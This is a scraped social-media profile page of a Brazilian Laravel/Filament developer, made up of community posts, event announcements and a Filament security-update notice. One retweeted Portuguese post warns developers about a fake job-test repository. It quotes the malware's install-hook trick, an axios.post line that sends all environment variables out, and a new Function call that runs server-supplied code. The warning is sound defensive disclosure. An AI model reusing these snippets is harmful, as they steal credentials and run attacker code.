Leandro Ferreira

768 posts

Leandro Ferreira

@leandrocfe

Laravel developer, @filamentphp Core Team Member, creator of Filament Brazilian Community - https://t.co/5NhylVABSi

Araraquara - SP - Brasil Katılım Şubat 2014

430 Takip Edilen1.3K Takipçiler

Sabitlenmiş Tweet

Leandro Ferreira@leandrocfe·24 May

I'm honored to be part of this team! 💛 I truly appreciate this opportunity and look forward to continuing my learning journey to contribute even more to this amazing Filament community! 🚀

English

149

9.1K

Leandro Ferreira retweetledi

Fabio Vedovelli@vedovelli74·23h

⚠️ Devs, parem tudo e leiam. Quase rodei malware na minha máquina agora mesmo e quero que vocês saibam exatamente como funciona o golpe. Recebi um link de um repo no GitHub: um "MVP" de um projeto web3/poker, com pedido pra clonar e rodar localmente. Visual de teste técnico, daqueles que recruiter manda. Antes de tocar em qualquer coisa, parei e li o código pelo próprio GitHub, sem clonar. Bem que desconfiei. Era malware. E não um qualquer — tinha DOIS payloads que executam SOZINHOS, sem você rodar nada explicitamente. 🎯 Payload 1 — dispara no `npm install` O `package.json` tinha `"prepare": "node server/server.js"`. O detalhe maldoso: o script `prepare` roda AUTOMÁTICO toda vez que você dá `npm install`. Dentro dele, escondido nas rotas do servidor, um: `axios.post(url, { ...process.env })` Ou seja: ele empacota TODAS as suas variáveis de ambiente — chaves de AWS, tokens de API, secrets, seed phrase de carteira cripto — e manda pro servidor do atacante. E não para aí: a RESPOSTA do servidor é passada pra `new Function("require", resposta)(require)`. Isso é execução de código arbitrário, com acesso total ao Node: filesystem, child_process, rede. Ele pode roubar suas chaves SSH, instalar persistência, o que quiser. A URL do atacante? Escondida em base64 no `.env`, decodificando pra um domínio na Vercel. Disfarce em cima de disfarce.

Português

184

780

410.7K

Leandro Ferreira retweetledi

Hassan Zahirnia@HassanZahirnia·2d

Hey friends! 👋 I’m looking for new projects & opportunities✨🥰 Feel free to reach out or tag someone who might be looking 🙏 👇 Here's my portfolio: zahirnia.com

English

637

Leandro Ferreira retweetledi

pokemaobr.dev (de palco)@pokemaobr·5d

Comunidades Dev do Brasil, sua ajuda é crucial! 🇧🇷 Estamos mapeando as necessidades de eventos (presenciais/online) para que se mantenham acontecendo. Queremos fortalecer seus encontros! Participe: formcomunidades.pokemaobr.dev

Português

253

Leandro Ferreira retweetledi

Filament 🦒@filamentphp·4d

Attention Filament users: we’ve identified and resolved a few security vulnerabilities. To address these vulnerabilities in your applications, please update to the following versions: v3.3.52 v4.11.5 v5.6.5

English

224

27.4K

Leandro Ferreira@leandrocfe·19 May

@danielhe4rt O prompt de 1 milhão 🌽

Português

204

danielhe4rt.php@danielhe4rt·19 May

claude pague minhas contas não cometa erros

Português

203

5.4K

Leandro Ferreira retweetledi

PhpStorm, a JetBrains IDE@phpstorm·13 May

Hey @laravel developers! Now you can manage and troubleshoot your Laravel Cloud deployments, including with AI assistance, in PhpStorm’s new Laravel tool window. Anything missing? We’d love to hear your feedback! 👂

English

11.6K

Leandro Ferreira retweetledi

Harris Raftopoulos@harrisrafto·13 May

Pest. Larastan. Pint. Laravel Zero. OpenAI PHP. PHP Insights. You've been using @enunomaduro's tools for years. On June 11th, you can meet him at our next Laravel Greece meetup in Athens. RSVP 👇 luma.com/d36uzjdu

English

1.7K

Leandro Ferreira@leandrocfe·12 May

@danielhe4rt @mattpocockuk Yes, me too 💯

English

298

danielhe4rt.php@danielhe4rt·12 May

i'm literally refactoring a BUNCH of bad decisions using /grill-with-docs from @mattpocockuk holy shit i should give it a try earlier. simply addicted and now my codebase has a really good context mapping, with readable decisions

English

11.9K

Leandro Ferreira retweetledi

Filament 🦒@filamentphp·10 May

We’re excited to announce that we now have another great premium plugin distribution partner to help you get your work in the hands of your users: Privato! More information at the blog post linked in the replies.

English

7.1K

danielhe4rt.php@danielhe4rt·9 May

what you should use in your next project: #php #laravel

English

2.2K

Leandro Ferreira@leandrocfe·9 May

@danielhe4rt 💯

QME

Leandro Ferreira@leandrocfe·8 May

@MrPunyapal @enunomaduro Happy birthday @enunomaduro !

Araraquara, Brasil 🇧🇷 English

1.3K

Punyapal Shah@MrPunyapal·8 May

Happy Birthday @enunomaduro 🎁🎂 Thanks for everything you done for PHP and Laravel community ❤️ 💜

English

1.8K

Leandro Ferreira@leandrocfe·8 May

@enunomaduro 🤣🤣🤣

QME

nunomaduro@enunomaduro·8 May

o bagulho tá doido 🇧🇷

Português

153

4.5K

Leandro Ferreira retweetledi

danielhe4rt.php@danielhe4rt·8 May

#phpsp pub

14.7K

nunomaduro@enunomaduro·7 May

after literally making history yesterday.. we are not done.. tonight: php sp special @laravelphp.. see you soon 🐘

English

3.3K

Leandro Ferreira@leandrocfe·7 May

@enunomaduro @laravelphp 🔥🔥

QME

Leandro Ferreira retweetledi

pokemaobr.dev (de palco)@pokemaobr·1 May

Galera, o PHP Day SP 2026 tá chegando e eu não vejo a hora! 🚀 Dia 09/05 na FIAP Paulista, um dia inteiro de muito PHP, networking e até stand-up! E sempre, a comunidade @phpsp Ingressos por R$99 Bora? 👉 phpdaysp.pokemaobr.dev #PHPDAYSP #PHPSP #PHP #Dev #SaoPaulo #ComunidadePHP

Português

316

Leandro Ferreira retweetledi

PHPSP@phpsp·7 May

Galera, últimas horas para adquirir os últimos ingressos que restam para o PHP Day São Paulo 2026 com @cviniciussdias e @enunomaduro. 🔥 bit.ly/php-day-sao-pa…

Português

1.1K

Leandro Ferreira retweetledi

nunomaduro@enunomaduro·7 May

Laravel / Php Brazil, this is for you 💛

English

181

7.4K

Leandro Ferreira@leandrocfe·7 May

@enunomaduro Thank you Nuno 💛

English

178

nunomaduro@enunomaduro·7 May

Just use laravel

English

125

4.5K

Keşfet

@danielhe4rt @laravel @enunomaduro @mattpocockuk @MrPunyapal @laravelphp @elonmusk @BarackObama